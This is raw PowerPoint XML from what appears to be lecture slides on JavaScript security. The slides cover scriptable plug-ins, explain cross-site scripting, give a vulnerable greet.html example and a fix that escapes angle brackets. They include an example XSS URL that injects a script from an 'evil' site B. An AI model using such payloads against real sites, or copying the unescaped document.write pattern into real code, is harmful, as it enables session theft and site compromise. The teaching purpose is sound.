      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335537166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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In many web browsers, JavaScript is used as a “script engine” for ActiveX controls (in IE) or plug-ins (other browsers). The Flash and Java plug-ins are commonly installed examples, and they expose important and powerful features to client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>problem is, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if plug-ins are scriptable, you must trust not just the web browser’s security architecture, but also the plug-in’s security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In practice, the Java and Flash plug-ins seem to have robust security and they are actively maintained and updated when security holes are discovered. ActiveX scripting has had a more checkered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>past</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176823958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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>practice, the Java and Flash plug-ins seem to have robust security and they are actively maintained and updated when security holes are discovered. ActiveX scripting has had a more checkered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>past</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The IE browser has access to a variety of scriptable ActiveX controls that are part of the Windows operating system, and in the past some of these scriptable controls have included exploitable security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>holes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317046489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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting, or XSS, is a term for a category of security issues in which an attacker injects HTML tags or scripts into a target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>website</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defending against XSS attacks is typically the job of server-side web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-side JavaScript programmers must also be aware of, and defend against, cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379867033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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This page is intended to be invoked with a URL like this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://www.example.com/greet.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When used like this, it displays the text “Hello David</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But consider what happens when it is invoked with this URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>siteA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>greet.html?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=%3Cscript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>siteB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/evil.js%3E%3C/script%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is hosted by the evil site B, but it is now embedded in site A, and it can do absolutely anything it wants with site A’s content.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273109" y="1184428"/>
            <a:ext cx="8643870" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>decodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A7A43"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A7A43"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>)) || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A7A43"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"Hello " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101446203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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can fix the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>greet.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file shown earlier by adding this line of code to remove the angle brackets around &lt;script&gt; tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting is a pernicious vulnerability whose roots go deep into the architecture of the Web. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are many online resources to help you defend against cross-site scripting. One important primary source is the original CERT Advisory about this problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.cert.org/advisories/CA-2000-02.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723737" y="2136362"/>
            <a:ext cx="7728958" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>name.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A7A43"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/&lt;/g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A7A43"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/&gt;/g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
